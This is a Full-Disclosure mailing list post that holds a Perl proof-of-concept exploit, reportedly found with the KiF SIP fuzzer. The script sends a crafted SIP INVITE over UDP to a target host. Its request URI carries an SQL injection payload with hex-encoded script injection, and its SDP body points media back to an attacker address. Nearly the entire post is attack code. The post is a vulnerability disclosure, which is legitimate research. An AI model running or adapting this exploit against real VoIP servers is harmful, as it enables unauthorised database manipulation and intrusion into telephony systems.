for testing purposes the POC of the vulnerabiliy discovered by the KIPH fuzzer RS #!/usr/bin/perl ############################################# # Vulnerabily discovered using KiF ~ Kiph # # # # Authors: # # Humberto J. Abdelnur (Ph.D Student) # # Radu State (Ph.D) # # Olivier Festor (Ph.D) # # # # Madynes Team, LORIA - INRIA Lorraine # # http://madynes.loria.fr # ############################################# use IO::Socket::INET; use String::Random; $foo = new String::Random; die "Usage $0 " unless ($ARGV[5]); sub iso2hex($) { my $hex = ''; for (my $i = 0; $i < length($_[0]); $i++) { my $ordno = ord substr($_[0], $i, 1); $hex .= sprintf("%lx", $ordno); } $hex =~ s/ $//;; $hex; } $callUser = $ARGV[0]; $targetIP = $ARGV[1]; $targetPort = $ARGV[2]; $attackerUser = $ARGV[3]; $attackerIP= $ARGV[4]; $attackerPort= $ARGV[5]; $socket=new IO::Socket::INET->new( Proto=>'udp', PeerPort=>$targetPort, PeerAddr=>$targetIP, LocalPort=>$attackerPort); $scriptinjection= iso2hex(""); $sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*"; $callid= $foo->randpattern("CCccnCn"); $cseq = $foo->randregex('\d\d\d\d'); $sdp = "v=0\r o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r s=-\r c=IN IP4 $attackerIP\r t=0 0\r m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r a=sendrecv\r a=ptime:20\r a=maxptime:200\r a=fmtp:96 mode-change-neighbor=1\r a=fmtp:18 annexb=no\r a=fmtp:98 0-15\r a=rtpmap:96 AMR/8000/1\r a=rtpmap:0 PCMU/8000/1\r a=rtpmap:8 PCMA/8000/1\r a=rtpmap:97 iLBC/8000/1\r a=rtpmap:18 G729/8000/1\r a=rtpmap:98 telephone-event/8000/1\r a=rtpmap:13 CN/8000/1\r "; $sdplen= length $sdp; $msg = "INVITE sip:$sqlinjection\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r From: ;tag=1\r To: \r Call-ID: $callid\@$attackerIP\r CSeq: $cseq INVITE\r Max-Forwards: 70\r Contact: \r Content-Type: application/sdp\r Content-Length: $sdplen\r \r $sdp"; $socket->send($msg); _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/